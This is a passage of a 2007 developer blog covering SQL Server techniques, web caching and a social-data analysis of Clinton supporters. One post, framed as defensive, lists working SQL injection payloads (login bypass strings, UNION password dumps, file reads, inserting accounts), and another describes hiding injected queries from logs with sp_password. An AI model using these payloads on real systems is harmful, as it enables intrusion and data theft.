Monday, December 17, 2007

Make your website faster in 5 minutes

The "speed" or "performance" of your website is only based on one thing: how long it takes from when your user clicks until the data gets from your servers to the eyeballs of your user. Some companies can spend hundreds of hours and millions of dollars tuning queries, to shave off 20% of a 5ms query, but at the end of the day all that matters is your application's response time as perceived by the end user.

For most websites I'd say 2% of the time is spent in the database, 20% in the app code, 10-20% in transfer or latency, while the rest is spent or wasted on the front end. If i was going to spend the least amount of time/money to increase the most performance, I would focus on the front end of the application. Specifically, on how the browser requests, caches and renders data.

You're end user shouldn't have to wait around for stuff he doesn't need. Theres no point in hitting the webserver again and again requesting the same exact media files (css/javascript/images). These dont change so its a waste of processing power and bandwidth to server them. In order to prevent the user's browser you have to explain that their local cache shouldn't expire instantly. Set far future expires headers on your static content and you wont have to server it again and again. Doing this is trivial in either Apache of IIS

ExpiresActive On
ExpiresDefault "access plus 1 month"

This is what i have set on my static content server, if you're using the same webserver to serve up dynamic content, you probably want to specify expires header by type instead

ExpiresByType image/gif A2592000
ExpiresByType image/png A2592000
ExpiresByType image/jpg A2592000
ExpiresByType image/jpeg A2592000
ExpiresByType application/x-javascript A2592000
ExpiresByType text/css A2592000

You might have just reduced your bandwidth and response time by 20%. Additionally, read up on ETags and why they should be configured correctly. Probably just do this

FileETag none

Obviously, you want to send as little data as possible out of your webserver. Reducing file sizes and using common css/js files are pretty obvious performance techniques. What you might also want to do is compress text files as they are sent form your webserver; modern browsers can decode GZip'ed data at the small expense of processing power. To enable apache webserver to send gzip content use mod_deflate

AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css application/x-javascript

In my experience this seems to reduce the size of html/js/css files by 60% or more. Obviously this will reduce the transfer time of your content.

Finally, understand how browsers render web pages. Any time JavaScript is run, the browser will block page rendering. This is because JavaScript is able to write out data to the page. If you load all your JavaScript in the , your page won't start rendering on the client until it has all been transfered and loaded on the browser. Additionally you probably want to load all of your CSS as soon as possible; that way you can get required images as soon as possible if needed. A good rule of thumb:

Put your CSS at the top of the page
Put your JavaScript at the bottom of the page

On a side note, Django rocks and mootools rocks

Tuesday, November 06, 2007

The Fine Art of Software Estimation

Overheard at Social Sample:

"by the way 25-30 hours really means 60 hours"

"I'm just taking all estimates and doubling them now...even if people have already doubled them, i'm doing it again; blanket policy"

Maybe we need some Evidence Based Estimation

Friday, November 02, 2007

Metallica Fans Don't Support Hilary Clinton

What happens when you take a giant database full of social data and do some light data-mining and statistics: lots of random facts! (arguable worthless or priceless depending on what you use them for).

I am spending my Friday at Social Sample analyzing social data from supporters of 2008 presidential candidates; data found on online social networks. After coming up with some basic demographics, I searched the user base for music interests with high correlations to the normal population. A similar algorithm to what powers Social Suggester. I found that the artists / bands with the highest correlation to Hillary Clinton supporters were:

"MADONNA"
"TORI AMOS"
"FIONA APPLE"
"BJORK"
"PRINCE"
"DEPECHE MODE"
"GWEN STEFANI"
"PORTISHEAD"
"THE SMITHS"
"ELTON JOHN"
"NO DOUBT"
"KELLY CLARKSON"
"MILES DAVIS"
"THE CURE"
"JUSTIN TIMBERLAKE"

Hmm Interesting. Now what happens if you change the Social Suggester ranking algorithm to find the bands/artists with the lowest correlation between these two data sets?

"ATREYU"
"THE USED"
"MUDVAYNE"
"SLIPKNOT"
"TAKING BACK SUNDAY"
"BREAKING BENJAMIN"
"YELLOWCARD"
"DISTURBED"
"HINDER"
"BLINK 182"
"PANTERA"
"50 CENT"
"STAIND"
"METALLICA"
"SYSTEM OF A DOWN"

Also Interesting. These correlations weren't extremely high, but Hillary Clinton supporters that use online social networks were 4x less likely to be a fan of 50 Cent, and 5x less likely to be a fan of Breaking Benjamin. I'm not going to make any assumptions about what kind of people support Hillary Clinton, all we can say is that there a high correlation between the types of people who enjoy the first set of artists/bands, and a low correlation between the second. If anyone reads this please feel free to share any insight; please let me know if there are any other subcultures you'd like to see info on. I'll leave with some random data about Hillary Clinton supporters, (these are not facts [read: please dont sue me], just the data that our engine spat out based on analysis of the target group). Enjoy.

Interesting differences (all compared to the normal population, sample size =10.5 Million, all statistically significant)

Supporters were no more likely to be Female
Supporters were 10.9x more likely to be gay
Supporters were 1.25x more likely to be married
Supporters were 1.25x more likely to be a parent
Supporters were 1.50x more likely to be in grad school

Supporters were 2.01x more likely to be Agnostic
Supporters were 1.9x more likely to be Jewish
Supporters were 2.50x less likely to be Muslim
Supporters were 1.12x less likely to be Catholic

The same proportion of supporters Smoke cigarettes, but they are 1.1x less likely to drink alcohol

Find other high correlations at Social Suggester, or contact me for something specific. evan at socialsample . com

Wednesday, October 03, 2007

A cool way to alias columns

A cool way to alias columns, dunno how useful this is, but kinda cool

Select t.alpha, t.beta, t.gamma
FROM(SELECT 11,22,33)t(alpha,beta,gamma)

Monday, September 24, 2007

SQL Server Log Bypass

SQL Server (in)conveniently doesn't log queries which have sp_password in it (so the passwords don't show up in the logs).

This means that someone trying to break into your database using SQL injection can tack on "--sp_password" to the end of all their queries to avoid leaving a trail in the DB logs.

Of course all the requests will be stored in the web server log. Unless of course you use POST instead of GET

Sunday, September 23, 2007

Why you should use stored procedures. aka How to do SQL Injection.

Use stored procedures. Don't let people choose the queries that are being run on your database or you might open yourself up to a lot of harm. Any novice database user can turn your simple web app into an unrestricted interface to your database and/or server. Below are some common examples showing how hackers exploit your code to damage your database or access restricted data

1. Commenting out code / Login Bypass
A typical line of code that checks authentication based on a user name and password

SELECT * FROM members WHERE username = '$username' AND password = '$password'

What gets run on your database here if someone enters in their username as " admin'-- " with no password?

SELECT * FROM members WHERE username = 'admin '--' AND password = ''

unless your escaping string termination (single quotes here) the user was just able to bypass authentication as an arbitrary user.

2. Stacked Queries
Depending on the database driver and the database being used, multiple sql queries can be run in the same batch. This allows hackers to stack on arbitrary sql at the end of a normal query

SELECT * FROM products WHERE id = $id

This query might grab the product id out of the query string and then run this query. but if this hacker changes the query string and forces a non integer string such as "10;

SELECT * FROM products WHERE id = 10;
Drop products;

Probably not what you want your view product page to do.

3. UNION Injections: Forcing data out of the database

Imagine a page like this

http://somesite.com/viewproducts?productype=1

which grabs product names from a database which has a certain product type by executing this code and sql

SELECT productname FROM products WHERE type = $productypeid

for each productName in productNameResult
echo productName + "
"

Normally this pseudocode would output all the product names. However if the hacker changes the query string around they can turn your view products page into an easy interface to the data. Imagine the hacker massaged the querystring a tiny bit and changed the producttypeid parameter to be "1 and 1=0 union select username + '-' + password as productname from users_tbl " This would yield the following SQL

SELECT productname FROM products WHERE type = 1 and 1=0 union select username + '-' + password as productname from users_tbl

the end result is a dump of all the username / password on your view products page

username1-password1
username2-password2
username3-password3

4. Avoiding Anti-SQL Injection

You might think that an easy fix to this would be to just check for single quotes and escape them. However there are a bunch of ways to enter strings without quotes. For example in MySQL this will dump out the file C:\boot.ini

SELECT LOAD_FILE(0x633A5C626F6F742E696E69)

Hackers will commonly concatonate strings together using database

SELECT CHAR(75)+CHAR(76)+CHAR(77

5. Bypassing Logins and Authentication
Unfortunately most ametuer sites will break or bypass authenticaiton if you try some of these usernames:

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
Or to logon as a diff user:

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

More advanced sites might try MD5 Password hash checks, these can be bypassed as well

Username : admin
Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

6. Leveraging Error Messages
In SQL Server a hacker can use the Having clause to figure out what columns are being selected in the query they are trying to hack by entering the following fields in order.

' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and so on
If you are not getting any more error then it's done.

If the hacker is trying to do UNION SQL injection knowing the number of columns will help them greatly; they can use the order by clause to do this:

ORDER BY 1--
ORDER BY 2--
ORDER BY N-- so on
Keep going until get an error. Error means you found the number of selected columns.

7. Figuring out Column Types
If a hacker is trying to do UNION injection they'll have to know what types each of the columns are. Since datatype errors appear before union target errors, the hacker can easily figure this out by using aggregate or convert functions.

'union select sum(columntofind) from users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.

11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-
Error! – Third column is not an integer.
...Microsoft OLE DB Provider for SQL Server error '80040e07' Explicit conversion from data type int to image is not allowed.

8. Inserting Arbitrary Data
A hacker can use SQL injection to create an account to your app

‘; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*

9. Figuring out database type
@@version is a hackers friend (at least in MySQL and SQL Server)

INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)

10. Bulk Inserts to pull data off the server

Insert a file content to a table. If you don't know internal path of web application you can read IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.

Create table foo( line varchar(8000) )
bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
Drop temp table, and repeat for another file.

Friday, July 27, 2007

Persitant Logging through Aborted Transactions

Sometimes you want to log that a transaction failed when the transaction is aborted. This can be a problem when the logging is part of the rolled-back transaction.

CREATE TABLE TranLogging (id int)
CREATE TABLE Test (id int)
CREATE TABLE #Test (id int)
DECLARE @TranLogging table (id int)

BEGIN TRAN
INSERT INTO @TranLogging VALUES(1)
INSERT INTO Test VALUES(1)
INSERT INTO #Test VALUES(1)
ROLLBACK TRAN

SELECT '@TranLogging',COUNT(*) FROM @TranLogging
SELECT ' test',COUNT(*) FROM Test
SELECT '#test',COUNT(*) FROM #Test

insert into TranLogging
select * from @TranLogging

select * from TranLogging

DROP TABLE Test,#Test,TranLogging

You'll notice that the row inserted into the table variable was maintained after the rollback, you can use this after a rolled-back transaction to copy failures/abortions into a more persistent logging table.

Thursday, July 12, 2007

Capital IQ Screening Team mentioned on TheStreet.com

As you probably know I work for Capital IQ on the Screening & Analytics Team, I'm always interested to see how clients use the tools I help develop. Today we were mentioned on TheStreet.com as a tool used by one of their writers, although we do have the majority of wall street as clients, its always cool to see a mention in the media.

These Gene-Drug Stocks Are Getting Hot

Thursday, July 05, 2007

Calculating Medians in TSQL using 2005 Window Functions

Calculating Medians can be a common and expensive operation in many applications, inefficiently

The hard part about medians is that you need to take the middle value for an odd number of elements and the 2 middle values for an even number of elements.

The cool thing here is that when you can take these two sequences sorted in opposite directions the absolute difference between the two is smaller than or equal to 1 only for elements that are required for the median calculation.

In this case you’re using ‘memberid’ (or some other unique value) as the tiebreaker to guarantee determinism of the row number calculations. This is required for using this trick to figure out the median.

Once you grab only the values you need for the median calculation you can isolate them by grouping them by groupid and calculate the average for each group.

WITH RN AS
(
SELECT groupid, val,
ROW_NUMBER() OVER(PARTITION BY groupid ORDER BY val, memberid) AS rna,
ROW_NUMBER() OVER(PARTITION BY groupid ORDER BY val DESC, memberid DESC) AS rnd
FROM dbo.Groups
)

SELECT groupid, AVG(1.*val) AS median
FROM RN
WHERE ABS(rna - rnd) <= 1
GROUP BY groupid;

Here’s the temp table I made to test this out

USE tempdb;
GO
IF OBJECT_ID('dbo.Groups') IS NOT NULL
DROP TABLE dbo.Groups;
GO

CREATE TABLE dbo.Groups
(
groupid VARCHAR(10) NOT NULL,
memberid INT NOT NULL,
string VARCHAR(10) NOT NULL,
val INT NOT NULL,
PRIMARY KEY (groupid, memberid)
);

INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('a', 3, 'stra1', 6);
INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('a', 9, 'stra2', 7);
INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('b', 2, 'strb1', 3);
INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('b', 4, 'strb2', 7);
INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('b', 5, 'strb3', 3);
INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('b', 9, 'strb4', 11);
INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('c', 3, 'strc1', 8);
INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('c', 7, 'strc2', 10);
INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('c', 9, 'strc3', 12);
GO

Thursday, June 07, 2007

SQL Server 2008

On Monday at TechEd they announced the official name of the next version of SQL Server - Microsoft SQL Server 2008 and released the first public CTP (Community Technology Preview) of it for people to start playing with and evaluating.

"SQL Server 2008 Product Overview" whitepaper
CTP 3 for download
David Campbell's TechEd session on SQL Server 2008 webcast
SQL Server 2008 press release
SQL Server 2008 MSDN Forums
SQL Server 2008 website

Thursday, May 31, 2007

Generating a Numbers table

A numbers table can be really useful for lots of reasons, but i'm not going to go over that here, i'm just going to document my journey trying to create one.

Unfortunately, I'm a .NET programmer so i normally first think of a procedural way to do things. When i wanted to create a numbers table I started off with a looping solution, its not pretty, but it works, and you only have to run it once so who cares. so i started off with this

SET NOCOUNT ON
BEGIN TRAN
DECLARE @LoopCounter INT
SET @LoopCounter = 1
WHILE @LoopCounter <= 10000
BEGIN
INSERT numbers_tbl
VALUES(@LoopCounter)
SET @LoopCounter = @LoopCounter + 1
END
COMMIT WORK
GO

This took 29 seconds on our development DB server, not bad for a one time cost, but there must be a different way, i tried using a recursive query that used a table expression. This looked like a pretty sweet query

DECLARE @n AS BIGINT;
SET @n = 1000000;

WITH Nums AS
(
SELECT 1 AS n
UNION ALL
SELECT n + 1
FROM Nums
WHERE n < @n
)
INSERT INTO numbers_tbl
SELECT n
FROM Nums OPTION(MAXRECURSION 0);
GO
>Table 'numbers_tbl'. Scan count 0, logical reads 1009505
>Table 'Worktable'. Scan count 2, logical reads 6000001

Turned out this took 45 seconds, it ended up being a bit slower than my procedural version. Now this approach is kinda lame, really all we need to do is generate the first 1000 rows and then do a cross join on itself to generate the million rows required. However these rows won't have the right numbers per se, but we can use the row number function to give each row a number yielding us a numbers table from 1 to a million.

DECLARE @n AS BIGINT;
SET @n = 1000000;
WITH Base AS
(
SELECT 1 AS n
UNION ALL
SELECT n + 1 FROM Base WHERE n <>
),
Expand AS
(
SELECT 1 AS c
FROM Base AS B1, Base AS B2
),
Nums AS
(
SELECT ROW_NUMBER() OVER(ORDER BY c) AS n
FROM Expand
)
INSERT INTO numbers_tbl
SELECT n FROM Nums
WHERE n <= @n
OPTION(MAXRECURSION 0);

Ah success this took 18 seconds, 9K reads opposed to 7M, i'm guessing as the number of entries in the numbers table goes up, this query will scale much better

This is good, but its not perfect. (Not perfect enough for Voodoo-Itzik-black-sql-magic arts practitioners). The problem with the solution before was that we still are stuck doing recursive selects for the first 1000 rows, why start off with the square root? why not add an additional crosss join, allowing us to start off at the sqrt(sqrt(@n)). In fact lets just start off with 2, and will continue to cross join these together (increasing by an exponential factor of 2 on each join). With 5 joins we can generate 4.2B rows, and we use the minimal number of initial selects.

In this case, We start with a CTE that only has 2 rows, and multiple it by the number of rows with each following CTE by cross-joining two instances of the previous CTE. This results in 2^2^N rows, we can use the same row number trick to generate the actually numbers to insert into our table.

DECLARE @n AS BIGINT;
SET @n = 1000000;
WITH
L0 AS(SELECT 1 AS c UNION ALL SELECT 1),
L1 AS(SELECT 1 AS c FROM L0 AS A, L0 AS B),
L2 AS(SELECT 1 AS c FROM L1 AS A, L1 AS B),
L3 AS(SELECT 1 AS c FROM L2 AS A, L2 AS B),
L4 AS(SELECT 1 AS c FROM L3 AS A, L3 AS B),
L5 AS(SELECT 1 AS c FROM L4 AS A, L4 AS B),
Nums AS(SELECT ROW_NUMBER() OVER(ORDER BY c) AS n FROM L5)
INSERT INTO numbers_tbl
SELECT n FROM Nums
WHERE n <= @n;
GO

This query ran in only 2 seconds, if you want more than 4B rows you can add an additional level (L6) for 2^64 rows. Chances are no machine can even store that much so i've left off L6.

Now you can have the largest numbers table at your company.

Thursday, May 24, 2007

When to not not use Cursors Part 2

If you're a new-hire or intern of ours at Capital IQ, stop reading, never use cursors. Ever.

Well my last attempt to prove that cursors can sometime be useful was derailed by my co-worker Mike Forman

This time i have a better (read: valid) example

I have the following table:

Which shows a bunch of employees at an unamed company, and the number of bugs they've fixed each day. For each of these employees i want to determine the running total of bugs fixed, each day. I can use the results of this query to create a pretty graph of bugs fixed over time per developer.

Now, using a cursor based solution we scan each piece of data once, which garauntees we have O(n) performance, meaning that as the number of entries in our table increase we can still create the desired results in time proportional to the number of rows. A set based solution suffers from O(n^2) performance (assuming there is no index on empid, BugsFixed). Even if there was an index a scan will results in (developers * (days + days^2)/2) rows scaned...which basically simplifies to O(n^2).

Now since cursors involve some overhead, the cursor solution will lose to the set based solution for a small number of items, however due to the performance limitations described above, the cursor solution is the only scalable choice to solve this problem.

Now watch Mike beat this using the OVER Clause.....

Code to Create this table:

--CREATE TABLE
IF OBJECT_ID('tempdb.dbo.BugCounts') IS NOT NULL
DROP TABLE tempdb.dbo.BugCounts;
GO

CREATE TABLE tempdb.dbo.BugCounts
(
empid INT NOT NULL,
workDay smalldatetime NOT NULL,
bugsFixed INT NOT NULL,
PRIMARY KEY(empid, workDay)
);

--POPULATE TABLE create 10K data points
DECLARE
@newn AS INT, @newempid AS INT,
@newworkDay As INT, @newbugsFixed As INT
DECLARE C CURSOR FAST_FORWARD FOR
SELECT top 10000 n
FROM numbers_tbl
OPEN C
FETCH NEXT FROM C INTO @newn;
WHILE @@fetch_status = 0
BEGIN
INSERT INTO tempdb.dbo.BugCounts
VALUES (@newn%25, dateadd(day, rand()*-300, GetDAte()), CAST(RAND()*100 AS INTEGER))
FETCH NEXT FROM C INTO @newn;
END
CLOSE C;
DEALLOCATE C;

Cursor Solution:

DECLARE @Result
TABLE(empid INT, workDay SMALLDATETIME, bugsFixed INT, runbugsFixed INT);

DECLARE
@empid AS INT,@prvempid AS INT, @workDay SMALLDATETIME,
@bugsFixed AS INT, @runbugsFixed AS INT;

DECLARE C CURSOR FAST_FORWARD FOR
SELECT empid, workDay, bugsFixed
FROM tempdb.dbo.BugCounts
ORDER BY empid, workDay;

OPEN C

FETCH NEXT FROM C INTO @empid, @workDay, @bugsFixed;
SELECT @prvempid = @empid, @runbugsFixed = 0;

WHILE @@fetch_status = 0
BEGIN
IF @empid <> @prvempid
SELECT @prvempid = @empid, @runbugsFixed = 0;

SET @runbugsFixed = @runbugsFixed + @bugsFixed;

INSERT INTO @Result
VALUES(@empid, @workDay, @bugsFixed, @runbugsFixed);

FETCH NEXT FROM C
INTO @empid, @workDay, @bugsFixed;
END

CLOSE C;
DEALLOCATE C;
select *
from @result
order by empid, workday;

Improving SQL Server Performance

True or False? SQL Server produces execution plans that minimize overall resource use to improve system wide performance.

False. Sql server minimizes the time it takes to return results to the client, if multiple cpus are available it will run parts of the query in parallel even though a single cpu solution would minimize overall resource use.

When dealing with database performance problems, many database professionals will look at a variety of metrics, queue sizes, cache hit ratios, etc. However, when users use your database the only important metric, how long it takes for the database system to return results. System performance metrics are a lot different than the user's perceived performance, at the end of the
day only the latter matters.

The storage engine optimizes execution plans with this strategy; Solid Quality Learning's query tuning methodology revolves around the same concept. Taking a top down approach allows you to spend your time fixing the worst bottlenecks.

Methodology:

Analyze waits at the instance level
Correlate waits with queues
Determine a course of action
Drill down to the database/file level
Drill down to the process level
Tune indexes and queries

So go: SELECT * FROM sys.dm_os_wait_stats

More true/false cause I was bored:

Queries that never change in which query data in tables that never changes, always produces the same result. False. Not all queries have a distinct/unique correct logical result. Sql server execution plans may change based on external factors, the execution plan may change as operations are reordered

Where clause are always evaluated after the join clauses. False. Where clauses are only logically evaluated after the joins however the query optimizer adjusts the physical evaluation of the query result by filtering before the joins for increased efficiency.

Monday, May 21, 2007

When to not not use Cursors

Cursors are usually bad to use; almost always there is a more efficient way to solve your problem using a set based solution. However there are some cases when cursors allow you to create a solution that is exponentially easier to implement than a set based solution. In general you should only resort to using cursors when a difficult set based solution becomes trivial when solved using cursors.

A classic example is that you have 5 classrooms of various sizes, and 3 classes of various sizes, and you want to assign a class to each classroom utilizing the minimum space required.

we'll simplify this problem and leave dates and times out of this issue :). Now this problem is very difficult to solve using a set based solution (it is possible, google itzik). However this is pretty trivial to solve using a cursor based solution, psuedo code below

Declare 2 cursors, one of the list of classrooms (lets call it: RoomsCursor) sorted by increasing capacity (number of seats), and another cursor for the list of classes (ClassesCursor) sorted by increasing number of students.
Now Fetch the first (smallest since you sorted ascending) class from the RoomsCursor
While the fetch returned a class that needs a classroom

Fetch the smallest unused classroom from RoomsCursor. if there is no available room, or the room is too small, continue and fetch the next smallest. Repeat fetching new rooms until you find a room that has fit or run out of rooms
If you didnt run out of rooms (and the last fetch yielded a room and the number of seats in the room is smaller than the number of students in the current room:

if you found a big enough room, schedule the class
else, you ran out of rooms!
fetch another Class

Return the scheduled events

In this case we are scanning both the classrooms and the classes in order. We never back up the cursor. We schedule classes by matching classes to class rooms until we either run out of classses to find classrooms for or we run out of rooms to accomidate classes. The only time there is an error is when no solution exists.

This solution runs in O(N) time since we are simply stepping through the cursor, the worst case solution is that we look at each class or classroom once.

this will set up the problem

USE tempdb;
GO
IF OBJECT_ID('dbo.Classes') IS NOT NULL
DROP TABLE dbo.Classes;
GO
IF OBJECT_ID('dbo.Classrooms') IS NOT NULL
DROP TABLE dbo.Classrooms;
GO

CREATE TABLE dbo.Classrooms
(
classroomid VARCHAR(10) NOT NULL PRIMARY KEY,
classSize INT NOT NULL
);

INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('C001', 2000);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('B101', 1500);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('B102', 100);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('R103', 40);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('R104', 40);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('B201', 1000);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('R202', 100);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('R203', 50);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('B301', 600);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('R302', 55);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('R303', 55);

CREATE TABLE dbo.Classes
(
classid INT NOT NULL PRIMARY KEY,
eventdesc VARCHAR(25) NOT NULL,
attendees INT NOT NULL
);

INSERT INTO dbo.Classes(classid, eventdesc, attendees)
VALUES(1, 'Mikes Adv T-SQL Seminar', 193);
INSERT INTO dbo.Classes(classid, eventdesc, attendees)
VALUES(2, 'CIQ .NET Pages', 51);
INSERT INTO dbo.Classes(classid, eventdesc, attendees)
VALUES(3, 'How to Break the DB', 232);
INSERT INTO dbo.Classes(classid, eventdesc, attendees)
VALUES(4, 'XAML ROCKS', 89);
INSERT INTO dbo.Classes(classid, eventdesc, attendees)
VALUES(5, 'CIQ Security Issues', 897);
INSERT INTO dbo.Classes(classid, eventdesc, attendees)
VALUES(6, 'Data Modeling 101', 46);
GO

CREATE INDEX idx_att_eid_edesc
ON dbo.Classes(attendees, classid, eventdesc);
CREATE INDEX idx_classSize_rid
ON dbo.Classrooms(classSize, classroomid);
GO

Cursor Solution:

DECLARE
@classroomid AS VARCHAR(10), @classSize AS INT,
@classid AS INT, @attendees AS INT;

DECLARE @Result TABLE(classroomid VARCHAR(10), classid INT);

DECLARE CClassrooms CURSOR FAST_FORWARD FOR
SELECT classroomid, classSize FROM dbo.Classrooms
ORDER BY classSize, classroomid;
DECLARE CClasses CURSOR FAST_FORWARD FOR
SELECT classid, attendees FROM dbo.Classes
ORDER BY attendees, classid;

OPEN CClassrooms;
OPEN CClasses;

FETCH NEXT FROM CClasses INTO @classid, @attendees;
WHILE @@FETCH_STATUS = 0
BEGIN
FETCH NEXT FROM CClassrooms INTO @classroomid, @classSize;

WHILE @@FETCH_STATUS = 0 AND @classSize < @attendees
FETCH NEXT FROM CClassrooms INTO @classroomid, @classSize;

IF @@FETCH_STATUS = 0
INSERT INTO @Result(classroomid, classid) VALUES(@classroomid, @classid);
ELSE
BEGIN
RAISERROR('Not enough Classrooms for Classes.', 16, 1);
BREAK;
END

FETCH NEXT FROM CClasses INTO @classid, @attendees;
END

CLOSE CClassrooms;
CLOSE CClasses;

DEALLOCATE CClassrooms;
DEALLOCATE CClasses;

SELECT classroomid, classid FROM @Result;
GO

Thursday, May 10, 2007

What I Learned at Devscovery

We love XAML
We love LINQ
AJAX.ASP.NET sooo 2 weeks ago
If you aren't using silverlight, your not cutting edge
Jeffery Richter knows more than you do about programming
If your website/presentation/resume doesn't have graphics with reflections
then its not cool
Every Thing/Technology should be Asynchronous
Jeff Procise loves microsoft technology more than you do
People named Jeff are smart
WCF makes me fall asleep...or I passed out from XML spec overload
Read ingo rammers blog: http://blogs.thinktecture.com/
Make a macro for !do
Outofmemory exception occurs since we can't alloate spave in the large object heap
!dumpheap is the most important command except if you don't use -stat since you might have just given yourself a 10m coffee break
!dumpheap -min 1mb...figure out why we get outofmemory
Memory ressurection is a 'dark corner' of the garbage collector...aka necromancey.
Garbage collector is magical
None knows what a async pinned handle is
!traverseheap dump to xml - read in with clr profiler
'don't try to outhink microsoft'
Studt rotor code
Never call GC.collect() ....it is self tuning
Finalization is evil, unless you want performance consultants at your office
There are a ton of unannounced features in orcas
Buy .net memory profiler

Wednesday, May 09, 2007

Tips to Prevent SQL Injection

The following are examples of steps you can take to ensure some level of protection from SQL Injection however, any situation where you are generating dynamic SQL will leave you vulnerable to clever hackers.

In order to reduce the surface area for attack, do not enable functionality that isn't required such as the SQL Server Agent service or xp_cmdshell (which allows arbitrary commands to be run on the server)

Always provide minimal permissions to the executing user in order to limit their options and reduce your exposure. In SQL Server 2005, you can impersonate users, so the new credentials will even apply to code invoked dynamically at the server. This feature opens up a whole new set of security concerns. Dynamic SQL can now run under impersonated user credentials and
not even require direct permissions from the user executing the stored procedure.

Inspect users thoroughly and used stored procedures. If characters are allowed, use pattern matching to check whether SQL injection constructs (such as single quote, two dashes, sp_, xp_, UNION etc) exist in the input.

Always limit the lengths of inputs when possible. This will help reduce the hacker's ability to damage your system. Email address fields shouldn't be thoudands of characters long.

Use stored procedures! Stored procedures encapsulate user input to the database, type checking the input as well as allowing certain permissions.

In general dynamic sql is always dangerous since the users input can end up being executed. If possible its always safer to use static code as long as attention is paid to security issues. There are several tricks you can use to avoid dynamic sql such as using functions to parse input and invoke static code. Using static code will also give you a performance edge since the current implementation of stored procedures generates a new execution plan for each input.

If you ever need to expect quotes in your input (such as text inputs for a blog or something) a safe way to prevent sql injections is to simple replace CHAR(39) with CHAR(39)+CHAR(39) this will make it impossiblefor the hacker to escape the string. Using dynamic sql can be very powerful, however misuse and/or abuse can causeinefficient code that may open your database to attacks.

Tuesday, May 08, 2007

Correctly Setting Up tempdb

SQL Server stores data in tempdb for many activities that happen behind the scenes such as: spooling data for queries, sorting, row versioning, as well as holding temporary tables and table variables. Since this data is physically materialized on disk, tempdb becomes an obvious bottleneck forcing us to make special considerations.

Any system with heavy use should have tempdb on its own disk array, seperately from where user databases are located. Obviously you'll want to use as many spindles as possible using striping in raid 10. (raid 1 can be used for the log)

Everytime SQL Server is restarted, tempdb is recreated and it size reverts to the effective defines size, which defaults to 8MB. Since this will likely be too small for most databases, it will grow at 10% per growth creating small files that will likely be fragmented within the file system. Since processes will need to wait around for the file to grow, it is suggested that you set this to an appropriate size for your database and workload.

In order to determine what is an appropriate size you can observe the size of tempdb when the system is under load. You can then alter the SIZE parameter so that the effective defined size is more apropriate. Once this is set you won't have to worry about autogrowth until the tempdb gets full which ideally would only happen during irregular activity.

Monday, May 07, 2007

Temporary Tables, Table Variables, Table Expressions - Part 3/4

Table Expressions
In addition to physical temp tables we also have logical temporary tables which are merely virtual materialization of interim sets (opposed to physical materialization in temporary tables and table variables). Table expressions which include derived tables, common table expressions (CTEs), views and inline table-values UDFs give you this capability. This article will discuss situations where you may or maynot want to utilize these table expressions.

In general, table expressions should be used in cases when you need the temporary objectly for simplification. Table expressions should also be used when you only need to access the temporary data once or a limited number of times and do not need to index the interim results. When you actually run a query with a table expression, the query optimizer actually merges the underlying query with the outer one, querying the underlying tables directly.

Other than simplification, there will be some cases where you'll want to table expressions in order to improve performance -in these cases the optimizer might generate a better plan for your query compared to other alternatives.

In terms of scope and visibility, derived tables and CTEs are available only to the current statement, while views and inline UDFs are available globally.

Temporary Tables (#Tables)
Table Variables (@Tables)
Table Expressions (CTEs)

Sunday, May 06, 2007

Temporary Tables, Table Variables, Table Expressions - Part 2/4

Table Variables
Many would agree that table variables are some of the least understood T-SQL elements. There are manny myths asociated with their use such as table variables being purely memory-resident (not having physical representation) and that/therefore are always preferable to temporary tables. I'd like to explain why these myths are unfounded and explain some situations where you might want to use or not use table variables.

Limitations
Unlike physical abd temporary tables there ae certain limitations placed on table variables.

you cannot make explicit indices on table variables, only PRIMARY KEY, and UNIQUE constraints (CREATE UNIQUE INDEX). In fact you can'tcreate non-unique indices.
you cannot change the structure or table definition once it is declared
you cannot issue SELECT INTO statement against a table variable( however you can use INSERT EXEC).
you cannot qualify a column name with a table variable name
in queries that modify table variables, parallel plans will not be used.

tempdb
Despite popular belief, table variables do have physical representation in tempdb, similar to temporary tables.

Scope and Visibility
The scope of table variables is very well defined, and it is the same as any other variable: the current level and within the current batch only. You cannot access a table variable within innr levels of the call stack, and not even within the other batches within the same level. The limited scope will likely be an important deciding factor when determining whether or not to use temporary tables or table variables.

Transaction Context
